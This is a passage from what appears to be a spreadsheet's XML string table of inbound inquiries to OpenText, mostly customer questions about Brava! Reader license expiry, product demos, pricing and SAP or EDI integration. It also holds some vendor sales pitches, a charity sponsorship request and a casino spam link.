    <t>We purchased three Redact-It desktop licenses years ago.  We have one license currently being used but would like to install the other two licenses.  The installation instructions I have were from Infograph in 2014.  I need new installation instructions and am wondering if the PIN's I have for the licenses are still active.</t>
  </si>
  <si>
    <t>Looking to access GXS catalog and upload new UPC codes. Employee Stephanie Debourg no long with company. need login credentials.</t>
  </si>
  <si>
    <t>Für einen Kunden suchen wir eine Lösung für die digitale Rechnungseingangsverarbeitung, die sich möglichst nahtlos in SAP ERP integrieren lässt.</t>
  </si>
  <si>
    <t>EDI´s Solution Implementation</t>
  </si>
  <si>
    <t xml:space="preserve">Question on Installing TeleForm as a Service on a VDI server. </t>
  </si>
  <si>
    <t xml:space="preserve">our Org. is planning to purchase a BI and Analytic tools, and currently I am looking and comparing products in the market.   would you be able to provide me with more information about this OpenText Analytic Suite. I was reading about some info in your website and I have few questions._x000D_
_x000D_
1. What is iHUB and Big Data Analytics?  Is Big Data Analytics like a Designer? where can you make your visuals and publish it to iHub so user can see it?_x000D_
3. What is OpenText Dashboard and OpentText Interactive Viewer? is this part of iHub? are these part of iHub when installed? _x000D_
_x000D_
Thanks You._x000D_
</t>
  </si>
  <si>
    <t>Looking for a demo of your product: Content Suite Platform</t>
  </si>
  <si>
    <t xml:space="preserve">We want use your 'free dwg viewer' to print dwg drawings. Is it possible to open the viewer with a script containing the file name and the command for printing. </t>
  </si>
  <si>
    <t xml:space="preserve">I spoke with representatives at the AIIM 2017 conference in Orlando. We are looking to find solutions to add to our business portfolio as a channel partner. I would like to introduce my team to your product and have a demo and a discussion about a possible future reseller partnership arrangement. Would it be possible to setup a time to have a demo and a good discussion about your product? I believe it was Sean I spoke with at the conference, but whomever can contact me. If you would like additional info about us, our current endeavors and business model, you can look us up at www.arms4rim.com </t>
  </si>
  <si>
    <t>I have a question about of release new version brava reader, because  the actual brava reader the trial version ends in seven days._x000D_
_x000D_
regards.</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Dans le cadre d'un projet je souhaite utiliser BIRT report designer et BIRT iserver._x000D_
Si j'ai bien compris, BIRT report designer est gratuit, mais je n'arrive pas à trouver si c'est le cas de BIRT iserver ou pas. _x000D_
Dans le cas où il est payant, puis-je avoir le prix? _x000D_
_x000D_
bien-cordialement.</t>
  </si>
  <si>
    <t>Request for Quotation for Standard Subscription Renewal for RightFax Business/Branch office Server for our Customer Badr Petroleum Company (BAPETCO) for 1 Year ASP</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je suis Abdellah, consultant au sein des équipes KPMG Advisory - ERP._x000D_
_x000D_
Nous réalisons actuellement une étude interne sur les différentes solutions de dématérialisation factures clients. _x000D_
_x000D_
Auriez-vous de la documentation que vous pourriez me faire parvenir à ce sujet, pour en savoir davantage sur ce que la solution offre ? _x000D_
_x000D_
Cordialement_x000D_
_x000D_
Abdellah DJOUDER_x000D_
Consultant - KPMG ADVISORY_x000D_
</t>
  </si>
  <si>
    <t>Provided user with IGCBrava! Reader16.0.0.17x86 and this software successfully installed._x000D_
_x000D_
User is trying to open a .pdf drawing and receives an error message advising that he needs to update the software "Invalid license. Unable to load files an update is required."_x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>Request for W-9</t>
  </si>
  <si>
    <t>Dear Customer service. I have just downloaded new version of BravaReader  (Get the FREE Brava! Reader) from http://www.opentext.com/what-we-do/products/enterprise-content-management/content-centric-applications/try-it-now     . It looks that this version expires 19th.  Are you planing to publish new version soon? I talket to my friend and he said that last version was valid for 3 months ofter installation. Regards Radek</t>
  </si>
  <si>
    <t xml:space="preserve">we want Arabic  version from " OpenText Enterprise Connect_x000D_
User Getting Started Guide" - As soon As possible </t>
  </si>
  <si>
    <t>Hi I'm working with one of your customers (TNT, the logistics company) and need access to the following documentation to assist in an ongoing TCP 16 project:_x000D_
_x000D_
https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&amp;objId=65226649&amp;objAction=browse&amp;sort=name_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Greg Hunter</t>
  </si>
  <si>
    <t>I will be at the DAM New York event I would appreciate the opportunity to discuss our 2nd generation DAM requirements and our intention to run a tender for DAM services later this year.</t>
  </si>
  <si>
    <t>Dear Marketing Head, Marketing Director or Marketing Manager,_x000D_
_x000D_
We are proud to announce the launch of our brand new, completely unique ICT Solutions Directory &amp; Special Package deal which will get you enhanced, long term exposure to over 5 000 Heads of IT, CIO’s and ICT Decision Makers throughout SA. _x000D_
_x000D_
Please contact me to send you our info pack to secure a prime slot to showcase one of your latest implemented solutions case studies or a company profile with key solutions you are promoting this year or a generic advert marketing your company._x000D_
_x000D_
We will be releasing the publication in September. If you are presenting a case study implementation we would require any implemented case study between June 2016- June 2017._x000D_
_x000D_
Clients already on board include SAP, Citrix, Mimecast, Checkpoint Security, Red Edge Solutions, HP Enterprise etc….._x000D_
_x000D_
Please find generic information attached – for an overview ~_x000D_
_x000D_
We are offering a 4 page advert special at R49 500 (ZAR) for Corporates valid till 15 April 2017._x000D_
_x000D_
SME Solution Providers R37 500 (ZAR) for a 4 Page Advert._x000D_
_x000D_
Besides your advert in the publication we will include the following:_x000D_
_x000D_
An announcement to over 30 ICT groups on LinkedIn, an announcement on Twitter and your company logo and / or banner ad in our direct mailer to over 3000 Heads of IT._x000D_
_x000D_
The publication is a final overview of your key solution offering for the year!_x000D_
_x000D_
We look forward to your company joining SAP, Mimecast, HP Enterprises, Red Edge Solutions, Citrix etc…._x000D_
_x000D_
_x000D_
The general package includes:_x000D_
_x000D_
·         Inclusion in the Guide of Practical Case Studies, useful Data Sheets &amp; General Branding of your Company _x000D_
·         Plus several Digital Marketing add-ons to assist you in placing Your Company directly in front of your Target Audience _x000D_
_x000D_
The question is WHY?  Why do solution providers need more coverage?  Does anyone know what YOU’RE doing?  _x000D_
_x000D_
NO, unfortunately not everyone does – which is why we are precisely doing this for you and al</t>
  </si>
  <si>
    <t>Good Morning OpenText team,_x000D_
_x000D_
Our names are Rish and Ahmad and we recently launched a healthy-snack subscription box for offices: Crunch Crate. Our snacking program would allow you the convenience of snacks being delivered to the office once a month, and the added benefit of a boost in employee productivity; the employees get to enjoy delicious, handpicked snacks to help them fulfill their late-afternoon and overtime-hour cravings! As a social enterprise at heart, we are donating $10 from every box to Canadian Feed the Children as well._x000D_
 _x000D_
If a snacking program would be of interest to your company, we would love to set up some time to walk you through more details and offer you a free sample box with some of our favorite brands! Please let us know if you have any questions and we would be happy to address them – we look forward to hearing from you!_x000D_
 _x000D_
Warm Regards,_x000D_
Ahmad Tahir</t>
  </si>
  <si>
    <t>I am interested in the automated Sales order entry.</t>
  </si>
  <si>
    <t>Track and secure corporate data</t>
  </si>
  <si>
    <t>One of our reseller partner is looking for the following software:_x000D_
5x QuickScan Pro Level 2_x000D_
Could you please help us to send us reseller price for them?_x000D_
_x000D_
Thanks a lot!_x000D_
Tímea</t>
  </si>
  <si>
    <t>I had tried to complete the form for Brava Reader free download, but on submitting I received this error:_x000D_
"A problem has occurred with this form. The system administrator has been notified and the problem will be addressed immediately._x000D_
Thank you for your patience."_x000D_
Please could you confirm you received it ok? _x000D_
Thanks_x000D_
Adrian</t>
  </si>
  <si>
    <t>Invoice contact information._x000D_
Hi,_x000D_
We got invoice from you but Company contact information is wrong. Could you please change Invoice To and Ship To informations and send new corrected invoice to us?_x000D_
_x000D_
Thank you._x000D_
_x000D_
BR,_x000D_
Niko Aurala</t>
  </si>
  <si>
    <t>have to more information about you OCR engine</t>
  </si>
  <si>
    <t>Expire date of the recent free BravaReader is 2017/04/19. How can I get an updated/prolonged version?</t>
  </si>
  <si>
    <t>Need latest version of Open Text Exceed Power Suite , Tamil Nadu India partner Details also.</t>
  </si>
  <si>
    <t xml:space="preserve">Job purpose </t>
  </si>
  <si>
    <t>Looking to have Opentext provide a solution for EDI connectivity to our external customer. Globally._x000D_
We have a customer in the USA that requires EDI document mapping created and transmitted.</t>
  </si>
  <si>
    <t>we want to work with you,pro soft sol is interested in outsource your project</t>
  </si>
  <si>
    <t>Request to download lasted Brava! for Documentum WebTop</t>
  </si>
  <si>
    <t>Costo y la forma de adquirirlo?</t>
  </si>
  <si>
    <t>I'm looking for the right software product to enable me to view a Graphical Network Map from a Sun Enterprise 250 Server running Sun Solaris 8 Operating System via a Telnet session running on a remote Laptop PC with Windows 7 64-bit OS running on it.</t>
  </si>
  <si>
    <t xml:space="preserve">I </t>
  </si>
  <si>
    <t>As for Brava Reader of the present version, an expiration date expires on April 19._x000D_
I want Brave Reader of a new version._x000D_
How can I get the latest program?_x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Full Service Eforms-Records Management Solution_x000D_
_x000D_
Hello and good day. I am an Information Systems Manager at New Castle County and we are currently using your products. Our needs are changing and I was wondering if you guys could inform us of what capabilities we are using versus what we have currently and assist us in understanding what your vendor capabilities are as far as the following:_x000D_
_x000D_
•	Are you a full service Eforms vendor?_x000D_
•	Is there an API to the eForms functionality? _x000D_
•	What interfaces does the eForms support? _x000D_
•	Will the eForms vendor provide downtime functionality? _x000D_
•	Does the eForms vendor support electronic signature? _x000D_
•	Are eForms created and maintained using conventional desktop tools like MS Word or Adobe Acrobat? Or, does the vendor require you to learn a proprietary form-building tool? _x000D_
•	Will the vendor charge for creating or updating new and existing eForms? _x000D_
•	Are the eForms web enabled?_x000D_
•	Do the eForms support departmental transactional processing_x000D_
_x000D_
We are in need of a full service Eforms vendor that can accomplish the above and give us a presentation on the services offered and price if any from what we are already paying._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Timothy Arnett_x000D_
Information Systems Manager | Help Desk/Applications_x000D_
New Castle County Government _x000D_
87 Reads Way | New Castle, DE 19720_x000D_
1st floor help desk_x000D_
Office (302) 395-5253  http://www.nccde.org_x000D_
 _x000D_
Excellent customer service and teamwork is our motto!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am the Director of Global Content Alliances and I wanted to learn more about your partner network. I realize you have mostly technology integrators and service providers but I wanted to talk about an alliance for content-as-a-service via your analytics or cloud marketplace. I work with just our content APIs and "white label URL" middleware to let you push out data to your client via your solution or to integrate it into your analytics. I would like to discuss a few ideas I had around supply chain management or vendor risk management. Thank you, _x000D_
Tracey</t>
  </si>
  <si>
    <t>Hello Open Text, I need to know if our company has a support contract in place with you.  In case not, what would be needed to get access to knowledge center and support access?  Thanks, Luis Jimenez</t>
  </si>
  <si>
    <t>Brava! Reader free is saying in the program a new version is required but when I download the newest from the site, its the same version 16._x000D_
_x000D_
Where can I get the newest version so we don't go without?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>The current version of Brava that we are using at the company that I work it expires on 4/19/2017. I have went onto your website looking for an updated version, but the only one I find is the version that we currently have. If I could get some assistance with this it would be greatly appreciated.</t>
  </si>
  <si>
    <t>Looking at starting an SAP Archiving project and need services and road map.</t>
  </si>
  <si>
    <t>I have attempted to fax over a purchase order with no answer. I am in need of getting the correct email address to assure that OPEN TEXT will get the PO.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently submitted a request to download the free Brava reader, but I'm not receiving the email link to download the software. Is there an alternate method (or webpage) to receive the link?  </t>
  </si>
  <si>
    <t>I have some questions about ApplicationXtender</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
My name is Aliya Hack and I am contacting you from a Guelph based, grassroots charity called Bracelet of Hope. We are currently hosting our 3rd annual Women to Women event, and we're looking to get support form our community partners to ensure that this event is successful._x000D_
_x000D_
Did you know 25% of girls at the primary level and 64% of girls at the secondary level in Lesotho, Africa are out of school? Did you know that 61% of women reported experiencing sexual violence in their lives in Lesotho? Bracelet of Hope is COMMITTED to changing these statistics!_x000D_
_x000D_
We are hosting our 3rd Annual Women to Women event at Linamar Centre on Saturday, May 28th from 12pm-5pm. Our goal is to raise awareness about the status of women internationally and to raise funds to support women and girls internationally. We host a "pop up boutique" where clothing, shoes, jewelry, scarves and items are donated to us, and we resell them at low prices. We have spoken word poets, live music, entertainment, food and beverages throughout the day, with amazing women supporting and networking with one another._x000D_
_x000D_
Our goal is to raise $20,000 to support women and girls. Bracelet of Hope would be extremely grateful for support as a sponsor for our Women to Women event. In return for your partnership, we would like to support your business by promoting your business at our event, on our social media, our website and to our donors though our newsletters and updates._x000D_
_x000D_
If you are interested in participating in this event either as a donor or a sponsor, or if you have any questions or concerns, please feel free to reply to this email to contact, to email our Director of Business Development at at ccoghlan@braceletofhope.ca or browse our website at www.braceletofhope.ca Additionally, we have a sponsorship package available for you to peruse, if you are interested._x000D_
_x000D_
Thank you so much for your time,_x000D_
_x000D_
Aliya Hack_x000D_
Member, Bracelet of Hope</t>
  </si>
  <si>
    <t>I haven't still received the download Brava Reader link</t>
  </si>
  <si>
    <t>Hi, I want to know more about Opentext Analytics Designer, Maybe a tutorial or something, and I want to know about the complete version of it (not 45 days trial)</t>
  </si>
  <si>
    <t>We have been using Brava! Reader in our office for a few years now. I am in charge of updating Brava! Reader when necessary. We received the message for program renewal, so I just requested, downloaded, and installed the latest version of Brava! Reader 16.0.2.23. I am still getting the same Renewal/Update message as before all this. I am wondering what is going on? Email response is preferred, regards.</t>
  </si>
  <si>
    <t>Need Fax Solution for Customer.</t>
  </si>
  <si>
    <t>Could you tell me when the new version of Brava Reader will be available?  We are getting a warning that the current version expires on 4/19, but see that the new version has not become available just yet.  Any help with this is appreciated!</t>
  </si>
  <si>
    <t>I am interested in learning more about your solutions for mid sized law firms (time/billing, client/matter management etc.). Kind regards, Peter</t>
  </si>
  <si>
    <t>Attached e-mail didn't go through when I hit reply-_x000D_
From: Jim Repka _x000D_
Sent: April 10, 2017 12:02 PM_x000D_
To: 'OpenText' &lt;IGC-Sales@OpenText.com&gt;_x000D_
Subject: RE: FREE Brava! Reader Download_x000D_
_x000D_
Good morning,_x000D_
I’m still getting a notice that BravaReader will have to be updated after deleting previous versions and installing link below received this morning.  I did however, get a notice when originally installing that I already had a newer version but I installed anyways trying to get rid of the update notice._x000D_
_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jim Repka_x000D_
Production Costing Manager_x000D_
Burkard Industries, Inc._x000D_
E-Coat, Powder Coat, Liquid Paint, &amp; CARC_x000D_
Best Choice since 1934_x000D_
(586) 791-6520 x109; Fax (586) 791-8980_x000D_
www.burkardind.com_x000D_
_x000D_
 _x000D_
2016 Top Coating Shop Honoree_x000D_
_x000D_
2015 Top Coating Shop Honoree_x000D_
_x000D_
_x000D_
WARNING: This is an e-mail from Burkard Industries, Inc. that is for the intended recipient only and may contain confidential and privileged information. _x000D_
ITAR (U.S. International Traffic in Arms Regulations) governed export controlled data document contains technical information.  This information must not be transferred to foreign representatives without the proper authorization of the U.S. Government.  Violations may result in administrative, civil, and/or criminal penalties._x000D_
_x000D_
From: OpenText [mailto:info@opentext.com] _x000D_
Sent: April 10, 2017 10:47 AM_x000D_
To: Jim Repka &lt;Jim@burkardind.com&gt;_x000D_
Subject: FREE Brava! Reader Download_x000D_
_x000D_
  _x000D_
If your email program has trouble displaying this email, view it as a web page_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
		_x000D_
	Thank you for requesting the FREE Brava! Reader. _x000D_
_x000D_
Please click here to download._x000D_
_x000D_
Note: The download file size is 44.4 MB._x000D_
_x000D_
Internet Explorer users_x000D_
_x000D_
Click "Save as" to download the file and verify the filename is "bravareader.exe.” If not, you will need to rename the file to bravareader.exe after download._x000D_
_x000D_
If you have any questions, please call 1-800-398-7005_x000D_
	_x000D_
		_x000D_
_x000D_
_x000D_
 _x000D_
_________________________________________x000D_
This email was sent to: Jim@Burkard</t>
  </si>
  <si>
    <t>Interested in pricing for Documentum software and licensed resellers in the UK</t>
  </si>
  <si>
    <t>Discuss possible use of BIRT in our reporting environment.  1-hour free consultation.</t>
  </si>
  <si>
    <t>Ellucian is participating in the EU-US Privacy Shield Framework.  We have determined that Ellucian’s contract with Dell EMC (now Open Text) requires some mandatory updates.   We have prepared a Data Protection Addendum that I need to send to you for your signature._x000D_
_x000D_
Please provide a contact person at Open Text that I can discuss this matter._x000D_
_x000D_
Thank you._x000D_
_x000D_
David _x000D_
Bolton</t>
  </si>
  <si>
    <t>Hi, we are in the process of moving from Streamserve 4 to 5.6.1 and require a new license to move from the old system to the new. Would it be possible to get this sent through please so we can apply it to the new system? Cheers</t>
  </si>
  <si>
    <t>We have been using the free version of Brava! Reader and my version is due to be re-installed in 8 days. Normally I would go on your website, download a new file and be all set until it expired again. However this time when I install a new version, it still says that I have 8 days before it expires. Will a new version be out soon or have I done something incorrectly?_x000D_
_x000D_
Thanks!_x000D_
Amy</t>
  </si>
  <si>
    <t>Interested in building an ECM solution in a SharePoint environment.</t>
  </si>
  <si>
    <t xml:space="preserve">We are doing conversion of jasper reports to birt . Need sample of reports on below topics_x000D_
_x000D_
	BIRT Architecture_x000D_
	Creating datasource_x000D_
	Creating dataset_x000D_
	Creating Filter,Map,Sorting_x000D_
	Creating Parameter_x000D_
	Creating Dynamic Parameter and Filter_x000D_
	Cascading Parameter_x000D_
	Creating Join and Union Dataset_x000D_
	Creating Scriptlet_x000D_
	Creating Page variable and Localization_x000D_
	Style_x000D_
	Crosstab _x000D_
	Chart_x000D_
	Sub reports and Parallel reports_x000D_
	Event Handler_x000D_
	Installing BIRT runtime builder_x000D_
	Configuring BIRT report with BIRT runtime viewer_x000D_
	Sample example of BIRT deployment in web application_x000D_
	Library_x000D_
	Drill Down report_x000D_
	Template_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Just implemented Oracle and looking for a solution for AP.</t>
  </si>
  <si>
    <t>I downloaded the Free Brava! Reader, but it expires on 4/19/17.  Wondering how I get a version that will last longer than 1 week.</t>
  </si>
  <si>
    <t>We are using Open Text for EFM and this needs to be updated soon. We are looking for assistance on prerequisites, cost, time and other details on the project. We use SAP ERP 605 and are on the latest support pack. Kindly reply to the query at the earliest possible._x000D_
_x000D_
Regards_x000D_
Sanjay</t>
  </si>
  <si>
    <t>I am currently working for Fujitsu on the Southern Water Account which we took over from Wipro last year.  As part of the ongoing Service Improvement plans, we are looking to implement SAP Data Archiving, particularly in the Southern Water IS-U systems.  Currently, Southern Water only use OpenText as a PDF document repository, so I would like some help and advice about configuring the connection for data archiving, and possibly some ongoing consultancy during implementation although timescales for this are currently not 100% defined._x000D_
Many thanks,_x000D_
Ben Greenfield_x000D_
ben.greenfield@uk.fujitsu.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'd like to know more of Open text ECM and Archiving capabilities and pricing. We are currently reviewing ECM area architecture and solutions._x000D_
_x000D_
Please contact me by email or by phone on EEST office hours._x000D_
_x000D_
Thanks,_x000D_
Erno Kallio_x000D_
IT Product Manager, Enterprise Content Management_x000D_
Konecranes Global Corporation_x000D_
+358 40 098 1431</t>
  </si>
  <si>
    <t xml:space="preserve">i just found out my first class email but i have never accessed it before so i am unaware of the password for my account. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
We have HPOS 3.5.0.12.0.17 version installed on AIX server.Our  we have two productione node in which one is active and other is passive.We have manual failover mechanism.Destination devices which we are using is Print,Fax,Ftp and mail.We ahve dazel clients installed on SAP servers for transaction._x000D_
Now our client want to move HPOS from AIX to windows._x000D_
Is there is any migration document/tool available??_x000D_
How we can export ,important and test the data??_x000D_
</t>
  </si>
  <si>
    <t>I've been using Brava! Reader 16.0.2.13._x000D_
Now It says "An update for Brava! Reader will be required within 8 days.Please contact your supplier for an update." when use it._x000D_
Woud you tell me how to update Brava! Reader?</t>
  </si>
  <si>
    <t>I need to see how your online document management works. We are Partners with SAP in Kenya.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
wir hatten Ihnen mit datum von 10.03.2017 per Post die nachfolgende Aufforderung zu einer Ausschreibung.  Falls Sie noch interessiert sind teilzunehmen bitte wir um kurze Mitteilung bis zum 13.04.2017._x000D_
Vielen Dank _x000D_
Mit besten Grüßen_x000D_
Petra Scheider _x000D_
_x000D_
_x000D_
								  Berlin, den 10.März 2017_x000D_
Datenschutzvereinbarung _x000D_
_x000D_
Sehr geehrte Damen &amp; Herren,_x000D_
_x000D_
wir sind als ACCON-RVS Accounting &amp; Consulting GmbH bundesweit tätig und spezialisiert auf hochwertige Outsourcing-Dienstleistungen für die Bereiche Rechnungswesen, Lohn- und Gehaltsabrechnung sowie Dokumentenmanagement. _x000D_
Unsere technischen, organisatorischen und personellen Möglichkeiten sind im Spannungsfeld zwischen Zeit, Qualität und Kosten streng an produktiven und industriellen Fertigungsprozessen orientiert. Unsere Kunden (vor allem aus der Touristik) werden von unserem Team mit mehr als 170 Mitarbeitern (in Berlin und in Tunis) betreut. _x000D_
_x000D_
Für die automatische Bearbeitung von Eingangsrechnungen haben wir bereits seit einigen Jahren eine Softwarelösung im Einsatz. Diese Lösung werden wir aus strategischen Gründen ersetzen, um eine weiterentwickelte und umfänglichere Solution einzusetzen. Hierzu suchen wir einen geeigneten Anbieter, der auch unsere branchen-spezifischen Anforderungen umsetzen kann. _x000D_
_x000D_
Für das Auswahlverfahren haben wir ein ausführliches Pflichtenheft vorbereitet. Gerne möchten wir Sie zur Teilnahme einladen und Ihnen das Pflichtenheft zukommen lassen. Hierzu ist es erforderlich, dass Sie beiliegende Datenschutzerklärung rechtsverbindlich unterzeichnen und uns ein Exemplar bis zum 17.03.2017 per Email an sdaehnicke@accon-rvs.de oder postalisch zu Händen des Unterzeichners zurück senden. _x000D_
_x000D_
Bei Rückfragen steht der Unterzeichner gerne zur Verfügung. _x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Petra Scheider_x000D_
Assistenz der Geschäftsführung_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I downloaded the Brava Reader last version on your website but the expired date is April 19. Have you got a new version with an expired date higher than 19 Avril please ?_x000D_
Thanks a lot for your answer._x000D_
Best regards,_x000D_
Anne Lapalu_x000D_
</t>
  </si>
  <si>
    <t>Current version of Brava! Reader expires on 18th April...please can you advise when the new version will be available for download? Thanks</t>
  </si>
  <si>
    <t>Looking to get pricing for licenced Brava Reader</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm looking for the new verson of Brava Reader (free version) but I still find the old one (19/04/2017 free license end)._x000D_
It's in plan a new free version?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Questions about use of Brava viewer in IBM Content Navigator for Client UWV</t>
  </si>
  <si>
    <t>Hi, I would like to know the release date of Brava Reader and Brava Free DWG Viewer updates? Please let me know, thank you very much</t>
  </si>
  <si>
    <t>for trail version of the software</t>
  </si>
  <si>
    <t xml:space="preserve">Good day._x000D_
_x000D_
_x000D_
I am a co-owner of S.L. Avatar Call Centre Company, based in San Fernando City, La Union, Philippines, operating and handling outbound accounts with a U.S. client for the past 2 years, purposely to offer outsourcing customer service support to your company through our highly experienced customer service support team to take action on customers’ schedules and demand service requests ensuring that service level agreements are consistently met._x000D_
 _x000D_
I have an extensive experience of over 6 years in a call center environment currently managing a 20-seat call center handling outbound and inbound accounts for the U.S. and Australian Clients. I possess excellent management skills including client relationships, negotiating, resolving disputes and critical thinking.  I am very keen to join your team because you are able to offer call centers an array of impeccable career opportunities as well as growth and excellence._x000D_
 _x000D_
I am looking forward to discussing the proposal with you in more detail and I’m available by phone (+639332312156) or Skype (raine.dan) at any time most convenient for you. _x000D_
 _x000D_
Thank you for your time and consideration._x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Recently, we developed a customer which is using EDI to send over the purchase order file, but our system cannot handle it, so I am wondering if you guys can help to convert it._x000D_
_x000D_
_x000D_
Aiden</t>
  </si>
  <si>
    <t>Can I have the e-mail address of the business partner to get more details about XPression on-premises installation?</t>
  </si>
  <si>
    <t>My client is considering upgrading from SAP Classic GL to New GL.  Are there any Open Text upgrades required  to support this migration?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">trying to find were we download an update for 7.6.4._x000D_
Much appreciated </t>
  </si>
  <si>
    <t>Dear Sir / Madam ,_x000D_
_x000D_
Please do you need Batik Fabrics ?_x000D_
We would like to offer you our products : Batik Fabrics for Textile,_x000D_
Garment, Apparel, Clothes, Fashion, Accessories and Decoration._x000D_
_x000D_
It Hand Stamped Traditional process with 100 % Cotton Materials._x000D_
_x000D_
High Quality with Competitive Prices. Provided in All Sizes, Pictures,_x000D_
and Colors._x000D_
_x000D_
Please contact us for further info. Thank You._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Iwan Gunawan_x000D_
_x000D_
PD. Daharmas_x000D_
Batik Manufacturer Exporter_x000D_
Jl. Simangu No. B 6 Green Simangu Industry - Kasugengan Lor Depok_x000D_
Cirebon City, West Java - Indonesia_x000D_
Phone : +6282320073339 http://daharmas.blogspot.co.id/</t>
  </si>
  <si>
    <t>Dear Paul Joseph Mcfeeters_x000D_
_x000D_
_x000D_
Are you interested in taking your brand further with minimal overhead? _x000D_
_x000D_
Get bus advertising at @ $1,500 / month or less!_x000D_
_x000D_
Benefits of working with us:_x000D_
-Pay less if bus drives less_x000D_
-Bus travels all over SG!_x000D_
-Dashboard to see distance travelled_x000D_
_x000D_
More details about us at www.adperkm.com_x000D_
Let us know if you are keen!_x000D_
_x000D_
Regards,_x000D_
Arti_x000D_
AdPerKM_x000D_
90235444_x000D_
adperkm@gmail.com_x000D_
www.adperkm.com.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mr/Mrs,_x000D_
_x000D_
I am Marianna Mucciante and I’m currently attending the M.Sc in Management Engineering and now I am writing my master thesis project on the Italian web agency state of the art in A/B testing and funnel optimization._x000D_
_x000D_
Since I have found the Italian web agency lacking in these aspects, I am contacting you to research the current best practices, given that you provide a full comprehensive solution. _x000D_
_x000D_
My ultimate goal is to write a report where I analyse the Italian current position in order to show the gap with the rest of the European countries. This analysis might be interesting for you because it could represent the basis to quantify the chance to flood the Italian market, which is rich of opportunities to the present day. Moreover, coming into contact with the Italian agencies for the development of my work, I will have the possibility to mention OpenText and the opportunity it represents to them in order to offer the best help for their customers and to follow your methodology as best practice. _x000D_
_x000D_
So I would be glad if I might have the possibility to interview you about your business and how you manage it. I would like to ask you just a few questions about your philosophy and the method that you use in solve customer's problems._x000D_
 _x000D_
Looking forward to hearing from you._x000D_
_x000D_
Kind Regards,_x000D_
Marianna Mucciante_x000D_
</t>
  </si>
  <si>
    <t>Ticket # 1-2885370742</t>
  </si>
  <si>
    <t>I sent an email asking for someone to contact me with regards to finding out about Eroom. To date I have received NO reply and wondered why._x000D_
Please contact me with regards to potentially using Open Text as a solution to our documentation requirements._x000D_
Regards_x000D_
_x000D_
Ruth Gilpin</t>
  </si>
  <si>
    <t xml:space="preserve">Apex International Energy is an American company with a foreign branch in Egypt. Apex is an Oil &amp; Gas company working in the field of Exploration and production. currently I am Apex Accounting Manager, with 28 Y experience in the E&amp;P business, and I have a long experience with Artesia applications that were and still works in some companies in Egypt. , I know that Artesia become now Open Text. As Apex Egypt branch is newly established and we are looking for an Accounting software fir our business, covering the international industry and for sure we will take into considerations some of the local requirements . In the past All Artesia modules were fit our business in my previous companies that I worked with. so, can some one contact me, and send me a profile for the accounting system that open text running right now, with web system. waiting for your reply._x000D_
Best Regards,_x000D_
Ihab Ali </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mr Tom Jenkins,_x000D_
_x000D_
Please accept this note as a friendly editorial to your current publication, INGENIOUS. I will also contact Tom Jenkins and of course the publisher._x000D_
I am an artist based in Hamilton, Ontario and for twenty plus years have developed and worked on a project titled THE LINE MARKER PROJECT. Please visit www.cwells.com. Within the project I have exclusively researched and created works of art surrounding the history and socio cultural meaning of the line marker (the painted lines on the road)._x000D_
My research since 19999 has lead to me to both Detroit and Trenton, Michigan and their extensive archive which cites without discrepancy, Edward N. Hines as the inventor and 1911, the year of the line marker's invention. I could expand on this quite extensively, but suffice it to say this predates your book's notation of John Millar and 1930 by 19 years._x000D_
Please have someone contact me to discuss this further.I would welcome an opportunity to illuminate the role of Edward Hines et al and hope this can be corrected._x000D_
Thank you, with great respect,_x000D_
C.Wells </t>
  </si>
  <si>
    <t>Need to know more about OpenText Cloud Fax. Specifically if we can port our numbers over and if I can get a demo account set up.</t>
  </si>
  <si>
    <t>Dear sir_x000D_
with due respect that I just wanted to know about the employment opportunity in your organization and as for your knowledge I am doing Bs in computer science and currently studying in 6th semester._x000D_
I am looking for your positive response_x000D_
Regards_x000D_
Sher ul hassan_x000D_
Karachi_x000D_
Pakistan</t>
  </si>
  <si>
    <t>http://stemmeries.xyz &lt;a href="http://stemmeries.xyz"&gt;norsk kasino&lt;/a&gt; http://stemmeries.xyz - norsk kasino</t>
  </si>
  <si>
    <t xml:space="preserve">I need an update for free BravaReader after version 16.0.2.13 within 10 days. Can you help _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
me for same? Thank you in advance. Best regards, Johan Brinkman_x000D_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</si>
  <si>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I'd like to know the pricing for licensing OpenText Gupta Development Tools and Databases.</t>
  </si>
  <si>
    <t>I would like to have access to reseller (partner) information. Document Management Solutions are are new trend in my country (Papua New Guinea) and Laserfiche is having a foothold here with its partners. I have been working with M-Files but find the features very limited.</t>
  </si>
  <si>
